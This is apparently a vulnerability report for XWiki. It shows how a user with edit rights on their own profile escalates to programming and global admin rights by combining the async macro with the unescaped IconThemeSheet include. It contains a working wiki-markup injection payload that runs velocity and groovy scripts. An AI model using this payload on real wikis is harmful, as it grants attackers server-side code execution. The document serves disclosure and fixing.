Privilege escalation (PR) via async macro and IconThemeSheet from the user profile

Steps to reproduce:

1. Login as a user with just edit rights on the user profile and enable advanced mode and enable displaying hidden pages
2. Edit the user profile with the wiki editor and insert the following content

   }}}
   {{async async="true" cached="false" context="doc.reference"}}
   {{velocity}}
   Hello World!
   #if ($hasProgramming)
   I have programming rights!
   #end
   #if ($hasGlobalAdmin)
   I have global admin rights!
   #end
   {{/velocity}}
   {{groovy}}
     println("Hello from Groovy!")
   {{/groovy}}
   {{/async}}
   {{{
   

1. Edit the user profile with the object editor and insert an object of type "XWiki Sheet include". Select "IconThemeSheet" as sheet and click "Save & View".

Expected result

The provided input is displayed as-is as the color theme's code.

Actual result

The text

Hello World!
I have programming rights!
I have global admin rights!
Hello from Groovy!

is displayed, showing that we've just executed code with programming and global admin rights.

This demonstrates a privilege escalation from a user with just edit rights on the user profile to global admin and programming rights. The escalation is possible through the combination of two issues:

1. The IconThemeSheet includes $doc.content without escaping, allowing to execute macros in the context of the sheet that has programming rights.
2. The async macro allows circumventing the protection against nested script macros.